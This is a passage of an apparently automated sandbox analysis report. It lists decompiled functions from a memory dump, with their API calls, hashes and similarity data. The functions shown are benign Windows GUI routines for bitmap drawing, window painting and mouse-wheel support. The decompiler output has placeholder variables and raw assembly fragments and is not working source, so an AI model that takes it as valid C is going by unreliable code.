                                  					_v24 = GetDC(0);
                                  					if(_v24 == 0) {
                                  						E0042982C(_t77);
                                  					}
                                  					_push(_t93);
                                  					_push(0x4299a1);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t95;
                                  					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
                                  					if(_v20 == 0) {
                                  						E0042982C(_t77);
                                  					}
                                  					_pop(_t85);
                                  					 *[fs:eax] = _t85;
                                  					_push(0x4299a8);
                                  					return ReleaseDC(0, _v24);
                                  				} else {
                                  					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
                                  					if(_v20 != 0) {
                                  						_t78 = SelectObject(_v28, _v8);
                                  						_t91 = SelectObject(_v32, _v20);
                                  						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                  						if(_t78 != 0) {
                                  							SelectObject(_v28, _t78);
                                  						}
                                  						if(_t91 != 0) {
                                  							SelectObject(_v32, _t91);
                                  						}
                                  					}
                                  					_pop(_t86);
                                  					 *[fs:eax] = _t86;
                                  					_push(0x429a39);
                                  					DeleteDC(_v28);
                                  					return DeleteDC(_v32);
                                  				}
                                  			}





















                                  APIs
                                  • CreateCompatibleDC.GDI32(00000000), ref: 004298FB
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00429905
                                  • GetObjectA.GDI32(?,00000018,?), ref: 00429925
                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042993C
                                  • GetDC.USER32(00000000), ref: 00429948
                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00429975
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0042999B
                                  • SelectObject.GDI32(?,?), ref: 004299B6
                                  • SelectObject.GDI32(?,00000000), ref: 004299C5
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 004299F1
                                  • SelectObject.GDI32(?,00000000), ref: 004299FF
                                  • SelectObject.GDI32(?,00000000), ref: 00429A0D
                                  • DeleteDC.GDI32(?), ref: 00429A23
                                  • DeleteDC.GDI32(?), ref: 00429A2C
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                  • String ID:
                                  • API String ID: 644427674-0
                                  • Opcode ID: a849f981bfebedeecbccdeb8e3bfd3461015f72c508759d878a135f9e8fdc384
                                  • Instruction ID: dac4e50baeac14ea808e198775256db36741a02f7a9f47f1c1689ece663af671
                                  • Opcode Fuzzy Hash: a849f981bfebedeecbccdeb8e3bfd3461015f72c508759d878a135f9e8fdc384
                                  • Instruction Fuzzy Hash: 8E41FBB1F40215AFDB10DBE9DC42FAFB7B8EB48704F51042AB600F7281D6799D008B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E0044E3E8(intOrPtr* __eax, intOrPtr __edx) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* _v64;
                                  				intOrPtr* _t195;
                                  				intOrPtr* _t198;
                                  				intOrPtr _t207;
                                  				void* _t210;
                                  				intOrPtr _t218;
                                  				signed int _t236;
                                  				void* _t239;
                                  				void* _t241;
                                  				intOrPtr _t242;
                                  
                                  				_t239 = _t241;
                                  				_t242 = _t241 + 0xffffffc4;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                  					_v16 = GetWindowDC(E0044D590(_v8));
                                  					_push(_t239);
                                  					_push(0x44e64e);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t242;
                                  					GetClientRect(E0044D590(_v8),  &_v32);
                                  					GetWindowRect(E0044D590(_v8),  &_v48);
                                  					MapWindowPoints(0, E0044D590(_v8),  &_v48, 2);
                                  					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                  					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					if( *(_v8 + 0x165) != 0) {
                                  						_t210 = 0;
                                  						if( *(_v8 + 0x163) != 0) {
                                  							_t210 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                  						}
                                  						if( *(_v8 + 0x164) != 0) {
                                  							_t210 = _t210 +  *((intOrPtr*)(_v8 + 0x168));
                                  						}
                                  						_t236 = GetWindowLongA(E0044D590(_v8), 0xfffffff0);
                                  						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                  							_v48.left = _v48.left - _t210;
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                  							_v48.top = _v48.top - _t210;
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                  							_v48.right = _v48.right + _t210;
                                  						}
                                  						if((_t236 & 0x00200000) != 0) {
                                  							_t198 =  *0x4bae68; // 0x4bc904
                                  							_v48.right = _v48.right +  *((intOrPtr*)( *_t198))(0x14);
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                  							_v48.bottom = _v48.bottom + _t210;
                                  						}
                                  						if((_t236 & 0x00100000) != 0) {
                                  							_t195 =  *0x4bae68; // 0x4bc904
                                  							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t195))(0x15);
                                  						}
                                  						DrawEdge(_v16,  &_v48,  *(0x4a0db4 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x4a0dc4 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x4a0dd4 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x4a0de4 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                  					}
                                  					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                  					FillRect(_v16,  &_v48, E00428C98( *((intOrPtr*)(_v8 + 0x170))));
                                  					_pop(_t218);
                                  					 *[fs:eax] = _t218;
                                  					_push(0x44e655);
                                  					return ReleaseDC(E0044D590(_v8), _v16);
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 - 0x10))();
                                  					_t207 = E0043373C(E00433634());
                                  					if(_t207 != 0) {
                                  						_t207 = _v8;
                                  						if(( *(_t207 + 0x52) & 0x00000002) != 0) {
                                  							_t207 = E00433E88(E00433634(), 0, _v8);
                                  						}
                                  					}
                                  					return _t207;
                                  				}
                                  			}



















                                  APIs
                                  • GetWindowDC.USER32(00000000), ref: 0044E41C
                                  • GetClientRect.USER32 ref: 0044E43F
                                  • GetWindowRect.USER32 ref: 0044E451
                                  • MapWindowPoints.USER32 ref: 0044E467
                                  • OffsetRect.USER32 ref: 0044E47C
                                  • ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0044E495
                                  • InflateRect.USER32 ref: 0044E4B3
                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0044E509
                                  • DrawEdge.USER32(?,?,00000000,00000008), ref: 0044E5D5
                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0044E5EE
                                  • OffsetRect.USER32 ref: 0044E60D
                                  • FillRect.USER32(?,?,00000000), ref: 0044E629
                                  • ReleaseDC.USER32(00000000,?), ref: 0044E648
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                                  • String ID:
                                  • API String ID: 3115931838-0
                                  • Opcode ID: ee1e6f169d8936a547ba9efe69f8abffdf3bc1b8a8d86ca2d85d024deec98132
                                  • Instruction ID: c9e9ca00c4e4b89094c454927fe7a0bd601b21f3e3b150271b7a925d75cc01b5
                                  • Opcode Fuzzy Hash: ee1e6f169d8936a547ba9efe69f8abffdf3bc1b8a8d86ca2d85d024deec98132
                                  • Instruction Fuzzy Hash: 8591F671E04248AFDB01DBA9C985EEEB7F9AF09304F1440A6F518E7252C779AE44CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040767C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                  				intOrPtr* _v8;
                                  				struct HWND__* _t19;
                                  				int* _t20;
                                  				int* _t26;
                                  				int* _t27;
                                  
                                  				_t26 = _t20;
                                  				_t27 = __edx;
                                  				_v8 = __eax;
                                  				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                  				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                  				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                  				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                  				if( *_t27 == 0 || _t19 == 0) {
                                  					 *_a8 = 0;
                                  				} else {
                                  					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                  				}
                                  				if( *_t26 == 0 || _t19 == 0) {
                                  					 *_a4 = 3;
                                  				} else {
                                  					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                  				}
                                  				return _t19;
                                  			}









                                  APIs
                                  • FindWindowA.USER32 ref: 00407694
                                  • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 004076A0
                                  • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 004076AF
                                  • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 004076BB
                                  • SendMessageA.USER32 ref: 004076D3
                                  • SendMessageA.USER32 ref: 004076F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                  • API String ID: 1416857345-3736581797
                                  • Opcode ID: 1e86d51e94f6e260601bf7ec413160ed51caaddc5ba61ebbac31d1afdf99388b
                                  • Instruction ID: e8809af92ddc94ce4b29c9ec2cb8913ee3e21aaf89ab545646c2b3b64a23137a
                                  • Opcode Fuzzy Hash: 1e86d51e94f6e260601bf7ec413160ed51caaddc5ba61ebbac31d1afdf99388b
                                  • Instruction Fuzzy Hash: 77115470A4C305AFE3019F65CC41B6AB7A8EF44350F20447AFD41AB2C1D6B87C40D76A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E00433E88(void* __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				struct tagRECT _v28;
                                  				struct tagRECT _v44;
                                  				char _v56;
                                  				char _v72;
                                  				void* __ebx;
                                  				signed char _t43;
                                  				signed int _t79;
                                  				int _t80;
                                  				int _t81;
                                  				void* _t94;
                                  				intOrPtr _t107;
                                  				void* _t116;
                                  				void* _t119;
                                  				void* _t122;
                                  				void* _t124;
                                  				intOrPtr _t125;
                                  
                                  				_t122 = _t124;
                                  				_t125 = _t124 + 0xffffffbc;
                                  				_t94 = __ecx;
                                  				_v8 = __edx;
                                  				_t116 = __eax;
                                  				_t43 = GetWindowLongA(E0044D590(_v8), 0xffffffec);
                                  				if((_t43 & 0x00000002) == 0) {
                                  					return _t43;
                                  				} else {
                                  					GetWindowRect(E0044D590(_v8),  &_v44);
                                  					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                  					_v12 = GetWindowDC(E0044D590(_v8));
                                  					_push(_t122);
                                  					_push(0x433fe3);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t125;
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_t119 = _t116;
                                  					if(_t94 != 0) {
                                  						_t79 = GetWindowLongA(E0044D590(_v8), 0xfffffff0);
                                  						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
                                  							_t80 = GetSystemMetrics(2);
                                  							_t81 = GetSystemMetrics(3);
                                  							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                  							E0041B1E4(_v28.right - _t80, _t81, _v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							_t119 = _t119;
                                  							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                  						}
                                  					}
                                  					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                  					E00433A24( &_v56, 2);
                                  					E00433848(_t119,  &_v56, _v12, 0,  &_v44);
                                  					_pop(_t107);
                                  					 *[fs:eax] = _t107;
                                  					_push(0x433fea);
                                  					return ReleaseDC(E0044D590(_v8), _v12);
                                  				}
                                  			}






















                                  APIs
                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 00433EA3
                                  • GetWindowRect.USER32 ref: 00433EBE
                                  • OffsetRect.USER32 ref: 00433ED3
                                  • GetWindowDC.USER32(00000000), ref: 00433EE1
                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00433F12
                                  • GetSystemMetrics.USER32 ref: 00433F27
                                  • GetSystemMetrics.USER32 ref: 00433F30
                                  • InflateRect.USER32 ref: 00433F3F
                                  • GetSysColorBrush.USER32 ref: 00433F6C
                                  • FillRect.USER32(?,?,00000000), ref: 00433F7A
                                  • ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00433F9F
                                  • ReleaseDC.USER32(00000000,?), ref: 00433FDD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                  • String ID:
                                  • API String ID: 19621357-0
                                  • Opcode ID: cc4ba14c984228af9cde4c76db7193c50e96ad659ddc3643c38956547b0af42f
                                  • Instruction ID: dfeeb715b180da1d8bec3558f82ba9f17373f30b6f595d340cddae056295081d
                                  • Opcode Fuzzy Hash: cc4ba14c984228af9cde4c76db7193c50e96ad659ddc3643c38956547b0af42f
                                  • Instruction Fuzzy Hash: 33414071E041096BDB00EEE9CC42EDFB7BDEF49314F5001AAF914F7281DA38AE418664
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00430370(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                  				struct tagPOINT _v12;
                                  				int _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t60;
                                  				int _t61;
                                  				RECT* _t64;
                                  				struct HDC__* _t65;
                                  
                                  				_t64 = _a8;
                                  				_t65 = _a4;
                                  				if( *0x4bc933 != 0) {
                                  					_t61 = 0;
                                  					if(_a12 == 0) {
                                  						L14:
                                  						return _t61;
                                  					}
                                  					_v32.left = 0;
                                  					_v32.top = 0;
                                  					_v32.right = GetSystemMetrics(0);
                                  					_v32.bottom = GetSystemMetrics(1);
                                  					if(_t65 == 0) {
                                  						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							L13:
                                  							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                  						} else {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					}
                                  					_v16 = GetClipBox(_t65,  &_v48);
                                  					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                  						goto L14;
                                  					}
                                  					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                  					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                  						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							goto L13;
                                  						}
                                  						if(_v16 == 1) {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					} else {
                                  						goto L13;
                                  					}
                                  				}
                                  				 *0x4bc920 = E0042FDB8(7, _t60, "EnumDisplayMonitors",  *0x4bc920, _t65);
                                  				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                  				goto L14;
                                  			}















                                  APIs
                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004303A9
                                  • GetSystemMetrics.USER32 ref: 004303CE
                                  • GetSystemMetrics.USER32 ref: 004303D9
                                  • GetClipBox.GDI32(?,?), ref: 004303EB
                                  • GetDCOrgEx.GDI32(?,?), ref: 004303F8
                                  • OffsetRect.USER32 ref: 00430411
                                  • IntersectRect.USER32(?,?,?), ref: 00430422
                                  • IntersectRect.USER32(?,?,?), ref: 00430438
                                    • Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                  • String ID: EnumDisplayMonitors
                                  • API String ID: 362875416-2491903729
                                  • Opcode ID: c0f749031e112393485ebe353422efa6aae5748b4cf40fa60d3d30f78c2b83a7
                                  • Instruction ID: 9a47fb48cc81c6a3b068b433de160dedd5cab5b48cf9d5f61139c02cf2adac41
                                  • Opcode Fuzzy Hash: c0f749031e112393485ebe353422efa6aae5748b4cf40fa60d3d30f78c2b83a7
                                  • Instruction Fuzzy Hash: 4631F2B1E4110DAFDB10DFA5CC849EF77BCAB59704F00522BFA15E3241E7389A058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E0044B720(intOrPtr* __eax, void* __edx) {
                                  				struct HDC__* _v8;
                                  				struct HBITMAP__* _v12;
                                  				void* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				int _v84;
                                  				void* _v96;
                                  				int _v104;
                                  				void* _v112;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t38;
                                  				struct HDC__* _t59;
                                  				intOrPtr* _t88;
                                  				intOrPtr _t107;
                                  				void* _t108;
                                  				struct HDC__* _t110;
                                  				void* _t113;
                                  				void* _t116;
                                  				void* _t118;
                                  				intOrPtr _t119;
                                  
                                  				_t116 = _t118;
                                  				_t119 = _t118 + 0xffffff94;
                                  				_push(_t108);
                                  				_t113 = __edx;
                                  				_t88 = __eax;
                                  				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                  					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0044A2C0(_t88) != 0) {
                                  						_t38 = E0044B244(_t88, _t88, _t113, _t108, _t113);
                                  					} else {
                                  						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
                                  					}
                                  					return _t38;
                                  				} else {
                                  					_t110 = GetDC(0);
                                  					 *((intOrPtr*)( *_t88 + 0x44))();
                                  					 *((intOrPtr*)( *_t88 + 0x44))();
                                  					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
                                  					ReleaseDC(0, _t110);
                                  					_v8 = CreateCompatibleDC(0);
                                  					_v16 = SelectObject(_v8, _v12);
                                  					 *[fs:eax] = _t119;
                                  					_t59 = BeginPaint(E0044D590(_t88),  &_v80);
                                  					E00447F3C(_t88, _v8, 0x14, _v8);
                                  					 *((intOrPtr*)(_t113 + 4)) = _v8;
                                  					E0044B720(_t88, _t113);
                                  					 *((intOrPtr*)(_t113 + 4)) = 0;
                                  					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x44b872, _t116);
                                  					 *((intOrPtr*)( *_t88 + 0x44))();
                                  					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
                                  					EndPaint(E0044D590(_t88),  &_v80);
                                  					_pop(_t107);
                                  					 *[fs:eax] = _t107;
                                  					_push(0x44b879);
                                  					SelectObject(_v8, _v16);
                                  					DeleteDC(_v8);
                                  					return DeleteObject(_v12);
                                  				}
                                  			}


























                                  APIs
                                  • GetDC.USER32(00000000), ref: 0044B76B
                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044B78F
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0044B79A
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0044B7A1
                                  • SelectObject.GDI32(?,?), ref: 0044B7B1
                                  • BeginPaint.USER32(00000000,?), ref: 0044B7D3
                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0044B82F
                                  • EndPaint.USER32(00000000,?), ref: 0044B840
                                  • SelectObject.GDI32(?,?), ref: 0044B85A
                                  • DeleteDC.GDI32(?), ref: 0044B863
                                  • DeleteObject.GDI32(?), ref: 0044B86C
                                    • Part of subcall function 0044B244: BeginPaint.USER32(00000000,?), ref: 0044B26A
                                    • Part of subcall function 0044B244: EndPaint.USER32(00000000,?), ref: 0044B35E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                  • String ID:
                                  • API String ID: 3867285559-0
                                  • Opcode ID: f7b16ee8eebf37fba86433664ab73bc9cb111bbf7377b640bd226e6b47817914
                                  • Instruction ID: d5fcfde6073ac6bc32e8dc026f5d716762d7b2232e364763bc04e6438489a056
                                  • Opcode Fuzzy Hash: f7b16ee8eebf37fba86433664ab73bc9cb111bbf7377b640bd226e6b47817914
                                  • Instruction Fuzzy Hash: A441FC75B00204AFD700EBA9CD85B9EB7F8EF48704F10447AF905EB281DA79DD058B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00463EC4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				short _v22;
                                  				intOrPtr _v28;
                                  				struct HWND__* _v32;
                                  				char _v36;
                                  				intOrPtr _t50;
                                  				intOrPtr _t56;
                                  				intOrPtr _t60;
                                  				intOrPtr _t61;
                                  				intOrPtr _t62;
                                  				intOrPtr _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t68;
                                  				intOrPtr _t70;
                                  				intOrPtr _t80;
                                  				intOrPtr _t82;
                                  				intOrPtr _t85;
                                  				void* _t90;
                                  				void* _t107;
                                  				intOrPtr _t122;
                                  				void* _t124;
                                  				void* _t127;
                                  				void* _t128;
                                  				intOrPtr _t129;
                                  
                                  				_t125 = __esi;
                                  				_t124 = __edi;
                                  				_t107 = __ecx;
                                  				_t105 = __ebx;
                                  				_t127 = _t128;
                                  				_t129 = _t128 + 0xffffffe0;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_v36 = 0;
                                  				_v8 = __eax;
                                  				_push(_t127);
                                  				_push(0x46418c);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t129;
                                  				E0044557C();
                                  				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                  					_t50 =  *0x4baf3c; // 0x426434
                                  					E0040656C(_t50, _t107,  &_v36);
                                  					E0040CAC4(_v36, 1);
                                  					E00403DEC();
                                  				}
                                  				if(GetCapture() != 0) {
                                  					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                  				}
                                  				ReleaseCapture();
                                  				_t56 =  *0x4bcb7c; // 0x1c41284
                                  				E00466448(_t56);
                                  				_push(_t127);
                                  				_push(0x46416f);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                                  				_v32 = GetActiveWindow();
                                  				_t60 =  *0x4a0f38; // 0x0
                                  				_v20 = _t60;
                                  				_t61 =  *0x4bcb80; // 0x1c40e90
                                  				_t62 =  *0x4bcb80; // 0x1c40e90
                                  				E0041C8B8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
                                  				_t65 =  *0x4bcb80; // 0x1c40e90
                                  				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
                                  				_t66 =  *0x4bcb80; // 0x1c40e90
                                  				_v22 =  *((intOrPtr*)(_t66 + 0x44));
                                  				_t68 =  *0x4bcb80; // 0x1c40e90
                                  				E00465408(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
                                  				_t70 =  *0x4bcb80; // 0x1c40e90
                                  				_v28 =  *((intOrPtr*)(_t70 + 0x48));
                                  				_v16 = E0045E23C(0, _t105, _t124, _t125);
                                  				_push(_t127);
                                  				_push(0x46414d);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				E00463E14(_v8);
                                  				_push(_t127);
                                  				_push(0x4640ac);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				SendMessageA(E0044D590(_v8), 0xb000, 0, 0);
                                  				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                  				do {
                                  					_t80 =  *0x4bcb7c; // 0x1c41284
                                  					E00467268(_t80, _t124, _t125);
                                  					_t82 =  *0x4bcb7c; // 0x1c41284
                                  					if( *((char*)(_t82 + 0x9c)) == 0) {
                                  						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                  							E00463D74(_v8);
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                  					}
                                  					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
                                  				} while (_t85 == 0);
                                  				_v12 = _t85;
                                  				SendMessageA(E0044D590(_v8), 0xb001, 0, 0);
                                  				_t90 = E0044D590(_v8);
                                  				if(_t90 != GetActiveWindow()) {
                                  					_v32 = 0;
                                  				}
